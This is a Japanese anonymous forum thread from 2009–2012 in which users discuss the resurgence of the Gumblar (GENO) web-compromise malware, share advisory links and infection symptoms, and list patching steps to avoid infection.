526192.168.0.774:2009/10/18(日) 23:16:07 ID:YIA/Ffw80
再始動した模様なのでage
http://blog.scansafe.com/journal/2009/10/15/gumblar-website-botnet-awakes.html

感染したまま放置されてたサイトや、
対策が不十分だったサイトを見たら、さっそく変なスクリプト発見・・・
527192.168.0.774:2009/10/18(日) 23:49:21 ID:3V7/xmbJ0
なんと
528192.168.0.774:2009/10/19(月) 11:24:25 ID:hqU1jDcR0
セキュ板より転載
366 名前: 名無しさん@お腹いっぱい。 [sage] 投稿日: 2009/10/19(月) 10:55:17
再襲来したGENOウイルスについて報告してるブログみつけた。
ttp://blogs.yahoo.co.jp/noooo_spam/59011285.html
ttp://blogs.yahoo.co.jp/noooo_spam/59020592.html
ttp://blogs.yahoo.co.jp/noooo_spam/59029561.html

zlkon/gumblar/martuzは単一ホストでウイルスを撒いてたけど、
今度のスクリプトだと陥落した別サイトで撒いてるから、
従来のチェッカーじゃ判別できないな。
529192.168.0.774:2009/10/19(月) 21:56:32 ID:SXUexp960
うへー怖いな・・・
530192.168.0.774:2009/10/19(月) 22:53:05 ID:t5PH3W/d0
これは流行りそうだな
まさに、gumblar comes back!
531192.168.0.774:2009/10/21(水) 04:07:51 ID:BsxJ0MOv0
Google SafeBrowsingで、適当にmartuzスクリプト放置サイトを
拾ってみたら・・・・

martuzスクリプトの直後に
NewGumblarのスクリプト(<script src=〜.php ></script>)が追加されてた。
こりゃ同一犯なんだろうねえ・・・・
532192.168.0.774:2009/10/22(木) 13:40:42 ID:9iMdmyQM0
Genoウイルス(Gumblar)検出状況
http://slashdot.jp/~pluto/journal/491348
このphpファイルは見に行くたびに変わりますが、
カスペルスキーさんはまるで「おれにまかせろ」状態。かっこいい。
533192.168.0.774:2009/10/22(木) 15:45:05 ID:WyqDsNKh0
http://pc12.2ch.net/test/read.cgi/win/1255620129/140

Windowsが起動できない、(マウスは動くが画面真っ暗でwindowsが起動しない)
ってトラブルが出てて、自動更新失敗によるレジストリ破損と見られてるけど、
実はGENOなのか?
http://pc11.2ch.net/test/read.cgi/sec/1244633881/251
534192.168.0.774:2009/10/22(木) 17:00:27 ID:9iMdmyQM0
レジストリのdriverのなんたらとか
sqlなんたらchmのハッシュ調べればわかるんでね
535192.168.0.774:2009/10/23(金) 22:55:35 ID:epXZwyKF0
>>533
これじゃね?

黒い画面にマウスカーソル (Win32/Daonol)
 http://blogs.technet.com/jpsecurity/archive/2009/10/23/3288625.aspx
 再起動後に、黒い画面 (またはログオンスクリーンの色) に、マウスカーソルのみが表示されてしまう・・・
536192.168.0.774:2009/10/24(土) 02:39:17 ID:5GUKVqGx0
【セキュリティ】「GENO」に酷似したウイルスが流行の兆し、国内60サイトで感染確認(09/10/23)
http://pc11.2ch.net/test/read.cgi/pcnews/1256299220/

GENOウイルスに類似したあらたな攻撃が発生 
http://tsushima.2ch.net/test/read.cgi/news/1256287835/
537192.168.0.774:2009/10/25(日) 00:04:06 ID:h/d9Job30
今回のGENOも感染してるか否かの確認方法は前回と同じでいいのか?
538192.168.0.774:2009/10/25(日) 11:40:55 ID:onz9X9EW0
いいんでね?
539192.168.0.774:2009/10/25(日) 17:57:44 ID:N2xTSqMh0
>>535
知人PCも22日にこれになってセーフモードもなにも利かないんで
しかたないから再セットアップしたぜw
アンチウイルス入れて無いノーガードPCだった
540192.168.0.774:2009/10/25(日) 20:20:23 ID:FaKoDDbI0
>>539
乙です。色々サイト見たけど、この状態からの復旧は相当難しそうですね。

結構Gumblar(GENO)に感染していて潜伏状態だったPC、多いのかな?
Freeのセキュリティソフト、選択肢増えてるんだから何か入れれば良いのにねぇ。(苦笑

MSEあたりなら、ノーガード派にも受け入れやすいんだろうか...
541192.168.0.774:2009/10/26(月) 06:16:57 ID:bOuJ+ruU0
俺の友人のXPも真っ黒黒助だ
avast入ってたのに
ろくに更新もしてないんだとは思うけど
なんかlsass.exeエラーは出てるけど真っ黒でカーソル動くだけ
再セットアップしてさらにスキャンしてあげました
542192.168.0.774:2009/10/26(月) 18:51:38 ID:iUCf4CzS0
今回も携帯からサイト見る分は大丈夫なのかな?
543192.168.0.774:2009/10/27(火) 08:26:45 ID:+mI19/Pp0
問題無いが、パケ代には注意
544192.168.0.774:2009/10/27(火) 20:26:11 ID:gldzFeMo0
AVGで自動アップデートできないのもGENOの症状でしょうか?
545192.168.0.774:2009/10/27(火) 23:45:38 ID:Tnfh4hrr0
違うだろ
AVGスレでどうぞ
546192.168.0.774:2009/10/28(水) 20:56:21 ID:ALDKpRa40
>544

AVGで自動アップデートできないのはGENOの感染した症状の一部です。
genoは進化していますよ。
**のアップデートでは対応できません。
547192.168.0.774:2009/10/28(水) 21:02:46 ID:ALDKpRa40
AVG 9は、カリカリ・ソフトです。
新型GENOにもまだ未対応です。
ttp://www.virustotal.com/analisis/d7a0ebf90c79ac3bd08dc1e431e0cbcdb01e4e0fbf4a7690b64a6c0ae7262c74-1256543614
548192.168.0.774:2009/10/29(木) 01:16:39 ID:vNcQ1fvq0
しばらlく落ち着いてたと思ってたのに
549192.168.0.774:2009/11/05(木) 02:56:10 ID:6KQsgcnM0
Gumblar再々起動
550192.168.0.774:2009/11/05(木) 03:07:53 ID:Z0Xlitm00
 
551192.168.0.774:2009/11/27(金) 21:39:07 ID:+ILGL8bh0
ニフティのウィルスチェックしようとすると
カスペアドオンのインストール画面でブラウザが固まるんだが…
552192.168.0.774:2009/12/01(火) 14:10:18 ID:kHQYcET/0
GENOウイルススレ ★23
http://pc11.2ch.net/test/read.cgi/sec/1259607683/
553192.168.0.774:2009/12/10(木) 14:31:03 ID:IsDGsV3gO
Flashのアップデート公開されたな

>552
変な荒らしが住み着いてるぞ、なんだこれ
554192.168.0.774:2009/12/10(木) 14:34:02 ID:Bn4hH/xd0
はいはい
555192.168.0.774:2009/12/18(金) 15:15:12 ID:zuzqPmN80
うちのも黒い画面になるけど数回つけるとつく
ただ壷が使えなくなった
556192.168.0.774:2009/12/25(金) 22:23:34 ID:QN6U8Z750
こいつはwindows7でも感染報告あるの?
557192.168.0.774:2009/12/26(土) 07:26:34 ID:xFVMWyO/0
あったね
558192.168.0.774:2009/12/27(日) 17:06:12 ID:mjUeSJohO
559192.168.0.774:2010/01/07(木) 16:51:36 ID:2C5Kv5XL0
http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO(Gumblar)ウイルス対処法。

行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。

(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する

(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。

(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
560192.168.0.774:2010/01/11(月) 23:49:13 ID:WnL+xizZ0
windows7って対処方法ないんだよなわろす
561192.168.0.774:2010/05/01(土) 17:49:02 ID:lXIq/NWf0
そもそも感染しないから対処する必要はないしね
感染報告はガセだし
562192.168.0.774:2010/08/15(日) 06:54:45 ID:rSMCCoZe0
もう流行は収束したんかい?
563@株主 ★:2010/09/30(木) 09:50:32 ID:E2Hgq8T3P
564192.168.0.774:2010/10/26(火) 18:47:55 ID:4nqm+9mx0
dd
565192.168.0.774:2011/01/08(土) 15:54:57 ID:24P3dcU50
株式会社GENO - ECサイト運営スタッフ募集
http://www.find-job.net/list/j83468.html?from=23
566192.168.0.774:2011/05/11(水) 00:06:02.13 ID:uDZNuz8R0
genoにはいい宣伝になったろ
567192.168.0.774:2011/06/24(金) 23:38:35.07 ID:t2KAPW550
潰れかけてるがwww
568192.168.0.774:2012/02/14(火) 06:54:11.24 ID:fOKWHCt10
結局の所おさまったんか?
569192.168.0.774
あげ